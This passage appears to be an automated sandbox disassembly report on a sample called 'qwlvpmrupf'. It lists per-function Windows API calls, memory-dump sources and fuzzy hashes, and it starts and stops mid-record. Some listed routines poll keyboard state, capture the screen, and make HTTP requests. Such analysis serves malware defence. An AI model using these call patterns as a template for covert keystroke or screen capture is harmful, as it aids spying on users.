                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                • API String ID: 1839972693-4113822522
                                                • Opcode ID: 5cab4d9319f7d6eda180a9af836df26040f71a25b2532c6bfff77991210156d2
                                                • Instruction ID: 36243580d4744f5bf63c911af60c62da4989035e6521dd3f1644d6fdf6512c5a
                                                • Opcode Fuzzy Hash: 5cab4d9319f7d6eda180a9af836df26040f71a25b2532c6bfff77991210156d2
                                                • Instruction Fuzzy Hash: 457124715043619FC721EF25C88096BB7E4FF98364F118A2DF8959B291EB38DD45CB81
                                                APIs
                                                • LoadIconW.USER32(00000063), ref: 003D62BD
                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 003D62CF
                                                • SetWindowTextW.USER32(?,?), ref: 003D62E6
                                                • GetDlgItem.USER32(?,000003EA), ref: 003D62FB
                                                • SetWindowTextW.USER32(00000000,?), ref: 003D6301
                                                • GetDlgItem.USER32(?,000003E9), ref: 003D6311
                                                • SetWindowTextW.USER32(00000000,?), ref: 003D6317
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 003D6338
                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 003D6352
                                                • GetWindowRect.USER32(?,?), ref: 003D635B
                                                • _wcslen.LIBCMT ref: 003D63C2
                                                • SetWindowTextW.USER32(?,?), ref: 003D63FE
                                                • GetDesktopWindow.USER32 ref: 003D6404
                                                • GetWindowRect.USER32(00000000), ref: 003D640B
                                                • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 003D6462
                                                • GetClientRect.USER32(?,?), ref: 003D646F
                                                • PostMessageW.USER32(?,00000005,00000000,?), ref: 003D6494
                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 003D64BE
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                • String ID:
                                                • API String ID: 895679908-0
                                                • Opcode ID: dea75eaecda768b9852158a894a4ad0a4de38c5b42e959d2768f81baf1e17483
                                                • Instruction ID: dff3bde46df60893fca08e1d6ec11d2c3d93af9d12b4db2af4e221bcdc35dd84
                                                • Opcode Fuzzy Hash: dea75eaecda768b9852158a894a4ad0a4de38c5b42e959d2768f81baf1e17483
                                                • Instruction Fuzzy Hash: F071BE32900705AFDB21DFA9DE46BAEBBF5FF48704F100929E196A36A0C775E944CB10
                                                APIs
                                                • LoadCursorW.USER32(00000000,00007F89), ref: 003F0784
                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 003F078F
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 003F079A
                                                • LoadCursorW.USER32(00000000,00007F03), ref: 003F07A5
                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 003F07B0
                                                • LoadCursorW.USER32(00000000,00007F01), ref: 003F07BB
                                                • LoadCursorW.USER32(00000000,00007F81), ref: 003F07C6
                                                • LoadCursorW.USER32(00000000,00007F88), ref: 003F07D1
                                                • LoadCursorW.USER32(00000000,00007F80), ref: 003F07DC
                                                • LoadCursorW.USER32(00000000,00007F86), ref: 003F07E7
                                                • LoadCursorW.USER32(00000000,00007F83), ref: 003F07F2
                                                • LoadCursorW.USER32(00000000,00007F85), ref: 003F07FD
                                                • LoadCursorW.USER32(00000000,00007F82), ref: 003F0808
                                                • LoadCursorW.USER32(00000000,00007F84), ref: 003F0813
                                                • LoadCursorW.USER32(00000000,00007F04), ref: 003F081E
                                                • LoadCursorW.USER32(00000000,00007F02), ref: 003F0829
                                                • GetCursorInfo.USER32(?), ref: 003F0839
                                                • GetLastError.KERNEL32 ref: 003F087B
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Cursor$Load$ErrorInfoLast
                                                • String ID:
                                                • API String ID: 3215588206-0
                                                • Opcode ID: c3eaa48707cd312a217e69e14a02429a2849415a1f47cf2b9167c0ca30255e56
                                                • Instruction ID: b38e1bef9ffa5a16b33670f64f30d434dc695cd645db5cbff284c9880e32cdfc
                                                • Opcode Fuzzy Hash: c3eaa48707cd312a217e69e14a02429a2849415a1f47cf2b9167c0ca30255e56
                                                • Instruction Fuzzy Hash: BA414670D043196ADB11DFBA8C8586EBFE8FF04754B50452AE11CEB291DA78D901CF91
                                                APIs
                                                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00390456
                                                  • Part of subcall function 0039047D: InitializeCriticalSectionAndSpinCount.KERNEL32(0044170C,00000FA0,5E28F90F,?,?,?,?,003B2753,000000FF), ref: 003904AC
                                                  • Part of subcall function 0039047D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,003B2753,000000FF), ref: 003904B7
                                                  • Part of subcall function 0039047D: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,003B2753,000000FF), ref: 003904C8
                                                  • Part of subcall function 0039047D: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 003904DE
                                                  • Part of subcall function 0039047D: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 003904EC
                                                  • Part of subcall function 0039047D: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 003904FA
                                                  • Part of subcall function 0039047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00390525
                                                  • Part of subcall function 0039047D: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00390530
                                                • ___scrt_fastfail.LIBCMT ref: 00390477
                                                  • Part of subcall function 00390433: __onexit.LIBCMT ref: 00390439
                                                Strings
                                                • InitializeConditionVariable, xrefs: 003904D8
                                                • SleepConditionVariableCS, xrefs: 003904E4
                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 003904B2
                                                • WakeAllConditionVariable, xrefs: 003904F2
                                                • kernel32.dll, xrefs: 003904C3
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                • API String ID: 66158676-1714406822
                                                • Opcode ID: 9afa80551c048931d98ba4c331d8bb71f98ab68889fc9d94edfaa00c49beafde
                                                • Instruction ID: 8037d5550e031b2fd734862a7ffe7c49afe1f417384bf78fff7474a25fa0bc1f
                                                • Opcode Fuzzy Hash: 9afa80551c048931d98ba4c331d8bb71f98ab68889fc9d94edfaa00c49beafde
                                                • Instruction Fuzzy Hash: BA210B36E44310AFDF1A6BF8AD06B6977E4DF05B61F114136F901EA290DFB49C808E58
                                                APIs
                                                • CharLowerBuffW.USER32(00000000,00000000,0040DCD0), ref: 003E4E81
                                                • _wcslen.LIBCMT ref: 003E4E95
                                                • _wcslen.LIBCMT ref: 003E4EF3
                                                • _wcslen.LIBCMT ref: 003E4F4E
                                                • _wcslen.LIBCMT ref: 003E4F99
                                                • _wcslen.LIBCMT ref: 003E5001
                                                  • Part of subcall function 0038FD60: _wcslen.LIBCMT ref: 0038FD6B
                                                • GetDriveTypeW.KERNEL32(?,00437C10,00000061), ref: 003E509D
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: _wcslen$BuffCharDriveLowerType
                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                • API String ID: 2055661098-1000479233
                                                • Opcode ID: 87c4e2930e26fd049c60ba50c00831b1cfbcb5eb11bb29c7b3cd690e519b0adc
                                                • Instruction ID: 35a81c4f4961060827351e2d26f36d9e0e89aef52676a65a0cd1ca7c037dd1f8
                                                • Opcode Fuzzy Hash: 87c4e2930e26fd049c60ba50c00831b1cfbcb5eb11bb29c7b3cd690e519b0adc
                                                • Instruction Fuzzy Hash: 86B125316083529FC721DF29C890A6AB7E5BF98724F118A1DF4968B2D2DB34DC45CB92
                                                APIs
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,0040DCD0), ref: 003F4A18
                                                • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 003F4A2A
                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,0040DCD0), ref: 003F4A4F
                                                • FreeLibrary.KERNEL32(00000000,?,0040DCD0), ref: 003F4A9B
                                                • StringFromGUID2.OLE32(?,?,00000028,?,0040DCD0), ref: 003F4B05
                                                • SysFreeString.OLEAUT32(00000009), ref: 003F4BBF
                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 003F4C25
                                                • SysFreeString.OLEAUT32(?), ref: 003F4C4F
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                • String ID: GetModuleHandleExW$kernel32.dll
                                                • API String ID: 354098117-199464113
                                                • Opcode ID: 65a79fcf2d2869e24ccff68982bec8cf44513c4de0cfc76dbc488eaff45bca31
                                                • Instruction ID: 22925b0808ba69c506793ff60e75a91a82db3633008be061e1e0bdf9f94ddb02
                                                • Opcode Fuzzy Hash: 65a79fcf2d2869e24ccff68982bec8cf44513c4de0cfc76dbc488eaff45bca31
                                                • Instruction Fuzzy Hash: 63123D71A00109EFDB15CF94C984EBEBBB9FF45314F158098EA19AB261D731ED46CB90
                                                APIs
                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003ECE0D
                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 003ECE20
                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 003ECE34
                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003ECE4D
                                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 003ECE90
                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003ECEA6
                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003ECEB1
                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003ECEE1
                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 003ECF39
                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 003ECF4D
                                                • InternetCloseHandle.WININET(00000000), ref: 003ECF58
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                • String ID:
                                                • API String ID: 3800310941-3916222277
                                                • Opcode ID: 3d70ea5246491042eacef69055c05f799e77fef66282b34118131e72a1571a9a
                                                • Instruction ID: 5783089da32ddcc8e71dde30d4166cec3a8124d2b70ceaaf4cb9d8152f3de030
                                                • Opcode Fuzzy Hash: 3d70ea5246491042eacef69055c05f799e77fef66282b34118131e72a1571a9a
                                                • Instruction Fuzzy Hash: 0651AE70510248BFDB229FA5CD48AAF7BFDFF48744F004629F94696281D734E90ADBA0
                                                APIs
                                                • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 00408EF1
                                                • GetFileSize.KERNEL32(00000000,00000000), ref: 00408F01
                                                • GlobalAlloc.KERNEL32(00000002,00000000), ref: 00408F0C
                                                • CloseHandle.KERNEL32(00000000), ref: 00408F19
                                                • GlobalLock.KERNEL32(00000000), ref: 00408F27
                                                • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 00408F36
                                                • GlobalUnlock.KERNEL32(00000000), ref: 00408F3F
                                                • CloseHandle.KERNEL32(00000000), ref: 00408F46
                                                • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 00408F57
                                                • OleLoadPicture.OLEAUT32(?,00000000,00000000,00410C04,?), ref: 00408F70
                                                • GlobalFree.KERNEL32(00000000), ref: 00408F80
                                                • GetObjectW.GDI32(?,00000018,000000FF), ref: 00408FA0
                                                • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 00408FD0
                                                • DeleteObject.GDI32(00000000), ref: 00408FF8
                                                • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0040900E
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                • String ID:
                                                • API String ID: 3840717409-0
                                                • Opcode ID: 708fa8f83735ab74a9e769b25ea73fa7c7745344ab0ea5a85bcb3222b9f1ca03
                                                • Instruction ID: 3aaba56fb73829ec86cbf2c097114e4c0823e45aba79766e582f6c41b7a6b919
                                                • Opcode Fuzzy Hash: 708fa8f83735ab74a9e769b25ea73fa7c7745344ab0ea5a85bcb3222b9f1ca03
                                                • Instruction Fuzzy Hash: 48414C71A00205AFDB11DFA5CE48EAB7BB9EF89710F104069F905E7290DB749D45CB24
                                                APIs
                                                • GetDC.USER32(00000000), ref: 003F2F35
                                                • CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 003F2F45
                                                • CreateCompatibleDC.GDI32(?), ref: 003F2F51
                                                • SelectObject.GDI32(00000000,?), ref: 003F2F5E
                                                • StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 003F2FCA
                                                • GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 003F3009
                                                • GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 003F302D
                                                • SelectObject.GDI32(?,?), ref: 003F3035
                                                • DeleteObject.GDI32(?), ref: 003F303E
                                                • DeleteDC.GDI32(?), ref: 003F3045
                                                • ReleaseDC.USER32(00000000,?), ref: 003F3050
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                • String ID: (
                                                • API String ID: 2598888154-3887548279
                                                • Opcode ID: 3cb405aa39df044d899f48497b8ec878c5f8d3b61b3cb6e8d0202b3def9be3ec
                                                • Instruction ID: ca092b2697dbd682ebe741dbbc284d2f9c3ff743ea6cf61d5f15cab8df5e7dd3
                                                • Opcode Fuzzy Hash: 3cb405aa39df044d899f48497b8ec878c5f8d3b61b3cb6e8d0202b3def9be3ec
                                                • Instruction Fuzzy Hash: C461F3B5D00219EFCF05CFE4D984AAEBBB5FF48310F208529E659AB250D771A941CF94
                                                APIs
                                                • GetMenuItemInfoW.USER32(00442990,000000FF,00000000,00000030), ref: 003DC888
                                                • SetMenuItemInfoW.USER32(00442990,00000004,00000000,00000030), ref: 003DC8BD
                                                • Sleep.KERNEL32(000001F4), ref: 003DC8CF
                                                • GetMenuItemCount.USER32(?), ref: 003DC915
                                                • GetMenuItemID.USER32(?,00000000), ref: 003DC932
                                                • GetMenuItemID.USER32(?,-00000001), ref: 003DC95E
                                                • GetMenuItemID.USER32(?,?), ref: 003DC9A5
                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003DC9EB
                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003DCA00
                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003DCA21
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: ItemMenu$Info$CheckCountRadioSleep
                                                • String ID: 0
                                                • API String ID: 1460738036-4108050209
                                                • Opcode ID: f64c2ee771747f25a1406d5ce353a235909edd85ad9d9e305b445458fa0c3588
                                                • Instruction ID: 676cb7a72af22b129a2a0616594815b7e3dbef84d31c8a9efd668cb07d955e71
                                                • Opcode Fuzzy Hash: f64c2ee771747f25a1406d5ce353a235909edd85ad9d9e305b445458fa0c3588
                                                • Instruction Fuzzy Hash: 8761617293025BABDF12CFA4ED98AEEBBB8FB05304F111166F841A7251D7349D45CB60
                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003E469A
                                                • _wcslen.LIBCMT ref: 003E46C7
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 003E46F7
                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 003E4718
                                                • RemoveDirectoryW.KERNEL32(?), ref: 003E4728
                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 003E47AF
                                                • CloseHandle.KERNEL32(00000000), ref: 003E47BA
                                                • CloseHandle.KERNEL32(00000000), ref: 003E47C5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                • String ID: :$\$\??\%s
                                                • API String ID: 1149970189-3457252023
                                                • Opcode ID: da8cdd46471de6a7f54aec006692352297399c23d188bb7b6a114d7068f4d782
                                                • Instruction ID: 00b15dfdd0b52f2d3099a76f392bbb670dae07a37fd899612b65ea2632a5183c
                                                • Opcode Fuzzy Hash: da8cdd46471de6a7f54aec006692352297399c23d188bb7b6a114d7068f4d782
                                                • Instruction Fuzzy Hash: 0B31E4B1900259ABDB229FA1DC45FEB37BCEF89740F1041B9F615E60A0EB7096448B64
                                                APIs
                                                • timeGetTime.WINMM ref: 003DEEE0
                                                  • Part of subcall function 0038F27E: timeGetTime.WINMM(?,?,003DEF00), ref: 0038F282
                                                • Sleep.KERNEL32(0000000A), ref: 003DEF0D
                                                • EnumThreadWindows.USER32(?,Function_0006EE91,00000000), ref: 003DEF31
                                                • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 003DEF53
                                                • SetActiveWindow.USER32 ref: 003DEF72
                                                • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 003DEF80
                                                • SendMessageW.USER32(00000010,00000000,00000000), ref: 003DEF9F
                                                • Sleep.KERNEL32(000000FA), ref: 003DEFAA
                                                • IsWindow.USER32 ref: 003DEFB6
                                                • EndDialog.USER32(00000000), ref: 003DEFC7
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                • String ID: BUTTON
                                                • API String ID: 1194449130-3405671355
                                                • Opcode ID: 3aa43200e46e631d32d840a39482dc5de58ded08c987f2b061c19ae4c29cf460
                                                • Instruction ID: 673b9f4e693e687866e70f81943239fa529d4f5a492b2044a7b5cf4f44a5f9d8
                                                • Opcode Fuzzy Hash: 3aa43200e46e631d32d840a39482dc5de58ded08c987f2b061c19ae4c29cf460
                                                • Instruction Fuzzy Hash: D921A479100215BFEB127FA0FD88A2A3F6EF746746F120436F4019A3A1CB728D048A6C
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 003DA8EE
                                                • SetKeyboardState.USER32(?), ref: 003DA959
                                                • GetAsyncKeyState.USER32(000000A0), ref: 003DA979
                                                • GetKeyState.USER32(000000A0), ref: 003DA990
                                                • GetAsyncKeyState.USER32(000000A1), ref: 003DA9BF
                                                • GetKeyState.USER32(000000A1), ref: 003DA9D0
                                                • GetAsyncKeyState.USER32(00000011), ref: 003DA9FC
                                                • GetKeyState.USER32(00000011), ref: 003DAA0A
                                                • GetAsyncKeyState.USER32(00000012), ref: 003DAA33
                                                • GetKeyState.USER32(00000012), ref: 003DAA41
                                                • GetAsyncKeyState.USER32(0000005B), ref: 003DAA6A
                                                • GetKeyState.USER32(0000005B), ref: 003DAA78
                                                Memory Dump Source
                                                • Source File: 00000007.00000002.1952140583.0000000000371000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00370000, based on PE: true
                                                • Associated: 00000007.00000002.1952117573.0000000000370000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.000000000040D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952200113.0000000000433000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952252060.000000000043D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                • Associated: 00000007.00000002.1952275535.0000000000445000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_7_2_370000_qwlvpmrupf.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: 7bddc160a4a751adbc2c45b7fb365951c65579353a4365c2c84a12f34fc72609
                                                • Instruction ID: 2f3e043c823877cdd02e63ea49f21ce3b2da8082686ec6204dfe5114533acd67
